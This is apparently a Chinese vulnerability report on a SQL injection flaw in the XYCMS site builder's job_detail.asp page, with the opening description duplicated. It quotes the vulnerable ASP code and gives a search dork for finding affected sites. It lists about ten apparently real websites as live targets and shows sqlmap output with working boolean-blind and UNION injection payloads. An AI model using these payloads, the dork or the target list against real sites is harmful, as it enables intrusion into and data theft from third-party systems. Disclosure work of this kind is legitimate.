### 简要描述: XYCMS建站系统SQL注入#2 ### 详细说明: 同第一个 XYCMS建站系统SQL注入#1 这里提交的在wooyun没有提交过!这里提交不重复,证明: [<img src="https://images.seebug.org/upload/201412/28214924b517af2e9cc79e33f1ff57634b0f4639.png" alt="1228_t_10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/28214924b517af2e9cc79e33f1ff57634b0f4639.png) 除了:fwxm_detail.asp,news.asp,team_detail.asp这些外。。。 job_detail.asp未对id进行任何过滤就直接带入数据库查询 ``` id=request.QueryString("id") set rs=server.createobject("adodb.recordset") exec="select * from zpxx where id="& id rs.open exec,conn,1,1 if rs.eof then response.Write "<div style=""padding:10px"">没有相关信息!</a>" response.End() end if ``` [<img src="https://images.seebug.org/upload/201412/282151004d62c15db7b2200afe99935918d95caf.png" alt="1228_t_11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/282151004d62c15db7b2200afe99935918d95caf.png) ### 漏洞证明: 搜索特征: inurl:job_detail.asp?id= 实例:...
### 简要描述: XYCMS建站系统SQL注入#2 ### 详细说明: 同第一个 XYCMS建站系统SQL注入#1 这里提交的在wooyun没有提交过!这里提交不重复,证明: [<img src="https://images.seebug.org/upload/201412/28214924b517af2e9cc79e33f1ff57634b0f4639.png" alt="1228_t_10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/28214924b517af2e9cc79e33f1ff57634b0f4639.png) 除了:fwxm_detail.asp,news.asp,team_detail.asp这些外。。。 job_detail.asp未对id进行任何过滤就直接带入数据库查询 ``` id=request.QueryString("id") set rs=server.createobject("adodb.recordset") exec="select * from zpxx where id="& id rs.open exec,conn,1,1 if rs.eof then response.Write "<div style=""padding:10px"">没有相关信息!</a>" response.End() end if ``` [<img src="https://images.seebug.org/upload/201412/282151004d62c15db7b2200afe99935918d95caf.png" alt="1228_t_11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/282151004d62c15db7b2200afe99935918d95caf.png) ### 漏洞证明: 搜索特征: inurl:job_detail.asp?id= 实例: http://www.qdzhihui.cn/job_detail.asp?id=22 http://www.jmofcole.com/job_detail.asp?id=3 http://www.cdmalc.com/job_detail.asp?id=2 http://www.czjt.com/job_detail.asp?id=386 http://www.shenzhouintl.com/cn_jt/job_detail.asp?id=26 http://www.njjldg.com/job_detail.asp?id=2 http://www.xmwx.org.cn/job_detail.asp?id=45 http://zqrc.com.cn/job_detail.asp?id=29763 http://www.zn-test.cn/job_detail.asp?id=2 http://www.qdzhihui.cn/job_detail.asp?id=23 ... [<img src="https://images.seebug.org/upload/201412/28221918055329ccd99daa01128d14203ea625d5.png" alt="1228_t_12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/28221918055329ccd99daa01128d14203ea625d5.png) ``` GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] n sqlmap identified the following injection points with a total of 22 HTTP(s) requ ests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=22 AND 3795=3795 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=-8961 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(58)&CHR (104)&CHR(118)&CHR(121)&CHR(58)&CHR(106)&CHR(85)&CHR(73)&CHR(88)&CHR(100)&CHR(68 )&CHR(68)&CHR(110)&CHR(69)&CHR(108)&CHR(58)&CHR(113)&CHR(107)&CHR(104)&CHR(58),N ULL,NULL FROM MSysAccessObjects%00 --- ```
